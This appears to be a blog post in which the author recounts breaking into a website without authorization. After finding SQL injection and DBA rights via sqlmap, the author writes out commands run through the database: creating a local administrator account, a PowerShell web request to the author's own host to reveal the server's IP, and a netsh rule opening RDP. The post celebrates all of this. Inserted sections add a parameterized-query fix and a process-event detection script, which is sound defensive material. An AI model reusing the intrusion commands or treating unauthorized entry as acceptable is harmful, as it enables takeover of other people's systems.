Forgot Password to System Takeover
The best thing about having a hacker's mind and a programmer's mind is that you can find enjoyment everywhere.
Thanks to Muhammad Osman for helping a lot with this thing.
After about 6 months, I went to check my documents and settings on a website. I realised I had forgotten my password and couldn't log into the site, and guess what, there was no "forgot password" option at all.
I randomly entered a single quote (') just to test whether it was somehow vulnerable to SQL injection. And Boooom! I got an SQL error.
I went to GitHub and downloaded SQLMap so as not to waste time and to get better results quickly. Instead of wasting time on database enumeration etc., I checked whether the database user is a DBA, and yes, another excitement: the user is DBA.
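The SQL error above is the tell-tale sign of a query built by string concatenation. The following is an added example, not code from the original post or the site it describes: a constructed in-memory SQLite user table with a lookup written the vulnerable way next to the same lookup written with a bound parameter, so you can see why a lone quote makes one of them blow up and leaves the other unaffected. The table schema and the `probe` helper are assumptions for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory database standing in for the site's user table
    (hypothetical schema; the post does not show the real one)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-alices-password')")
    conn.commit()
    return conn

def lookup_vulnerable(conn, username):
    """Builds the query by string concatenation: a single quote in the input
    breaks the SQL syntax and the database raises an error, which is the
    symptom the post describes."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, username):
    """Binds the value as a parameter: the quote is treated as data, so the
    query simply finds no match and no database error reaches the client."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

def probe(func, username):
    """Run one lookup against a fresh database and report either
    ('ok', rows) or ('error', exception class name)."""
    conn = make_db()
    try:
        return ("ok", func(conn, username))
    except sqlite3.Error as exc:  # sqlite3.OperationalError on broken syntax
        return ("error", type(exc).__name__)
    finally:
        conn.close()

if __name__ == "__main__":
    for name in ("alice", "'"):
        print("vulnerable    ", repr(name), probe(lookup_vulnerable, name))
        print("parameterized ", repr(name), probe(lookup_parameterized, name))
```

The parameterized version is the fix; the second thing to fix is the error handling, since the raw database error reaching the browser is what told the author the injection worked.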
Let’s create a user and add it to the administrator’s group.
net user /add test pass1234
net localgroup administrators test /add
Now let's log into the system using RDP.
Oh crap! There is no such user on the server, even though it shows the user on the list. I had a sudden feeling: what if this is not the same server where the database is hosted, what if it is a different server? And yes, I was right, the database was on a different server.
Now the mission is to find the IP address of that server. From a little Google search, I found that we can make web requests through a PowerShell command. So I created a subdomain on my website and coded a PHP script that captures the visitor's IP address and User-Agent, to confirm whether the visit came from a user, from Google, or from PowerShell. I tried the following command.
powershell -Command "Invoke-WebRequest http://www.foo.com/"
Hurrah! We got the IP address. Now let's log in to RDP through this IP address.
Crap again! What the hell happened this time? We have everything, so why can't we simply log in? Oh wait! Could it be that the port is not open?
Let's open the port using the netsh command.
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
Now let’s login to RDP.
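Everything from the account creation to the firewall rule ran as an operating system command launched through the database. The following is an added detection example, not code from the original post: it evaluates constructed process-creation records (the fields you would get from a parsed Sysmon Event ID 1 or Windows 4688 event; field names are hypothetical) against two kinds of rule, a high-fidelity one for a shell whose parent is the database engine, and lower-fidelity ones for the specific commands seen in this post. It assumes the database is Microsoft SQL Server (the DBA check and the Windows commands point that way, but the post never names it), so the engine process is `sqlservr.exe`; the sample events, including the benign ones, are constructed.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """Constructed process-creation record (hypothetical field names)."""
    parent_image: str
    image: str
    command_line: str

# Assumption: the database is Microsoft SQL Server, so OS commands launched
# through the database show up as children of its service process.
DB_ENGINE = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe"}

# Command-line patterns for the steps in the post: account creation, adding
# it to Administrators, a PowerShell web request, and opening an inbound port.
COMMAND_RULES = [
    ("local account created",
     re.compile(r"\bnet(1)?(\.exe)?\s+user\b.*\s/add\b", re.I)),
    ("account added to Administrators",
     re.compile(r"\bnet(1)?(\.exe)?\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
    ("outbound web request from PowerShell",
     re.compile(r"Invoke-WebRequest|\biwr\b", re.I)),
    ("inbound firewall rule added",
     re.compile(r"\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\bdir=in\b", re.I)),
]

def basename(path):
    """Last path component, lower-cased: C:\\Windows\\System32\\net.exe -> net.exe."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def evaluate(event):
    """Return the list of rule names the event triggers (empty if benign)."""
    findings = []
    # High-fidelity signal: a shell whose parent is the database engine.
    if basename(event.parent_image) == DB_ENGINE and basename(event.image) in SHELLS:
        findings.append("shell spawned by database engine")
    # Lower-fidelity signals: the specific commands, whatever the parent.
    for name, pattern in COMMAND_RULES:
        if pattern.search(event.command_line):
            findings.append(name)
    return findings

def scan(events):
    """Return (command_line, findings) for every event that triggers a rule."""
    hits = []
    for event in events:
        findings = evaluate(event)
        if findings:
            hits.append((event.command_line, findings))
    return hits

# Constructed sample: four events mirroring the post's chain, two benign ones.
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcessEvent(SQL, CMD, 'cmd.exe /c net user /add test pass1234'),
    ProcessEvent(SQL, CMD, 'cmd.exe /c net localgroup administrators test /add'),
    ProcessEvent(SQL, CMD, 'cmd.exe /c powershell -Command "Invoke-WebRequest http://www.foo.com/"'),
    ProcessEvent(SQL, CMD, 'cmd.exe /c netsh advfirewall firewall add rule name="Open Port 3389" '
                           'dir=in action=allow protocol=TCP localport=3389'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 'notepad.exe C:\\notes.txt'),
    ProcessEvent(r"C:\Windows\System32\services.exe", SQL, '"' + SQL + '" -sMSSQLSERVER'),
]

if __name__ == "__main__":
    for command_line, findings in scan(SAMPLE_EVENTS):
        print(", ".join(findings), "<-", command_line)
```

The parent-process rule is the one worth paging on: a database engine has no business starting a shell, whatever the command. The command-line rules will also fire on legitimate administration (an admin adding a local user from a normal console), so treat them as audit events to correlate rather than alerts on their own.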
I am lazy as hell and have an exam starting tomorrow. I wanted to write the next amazing part of this article as well (taking over the database server) but will leave it for now.
Happy Hacking
I am a Top Rated Freelancer on Upwork working as a Python and Java developer; if you need any scraping or automation services, do refer projects to me. Thank you.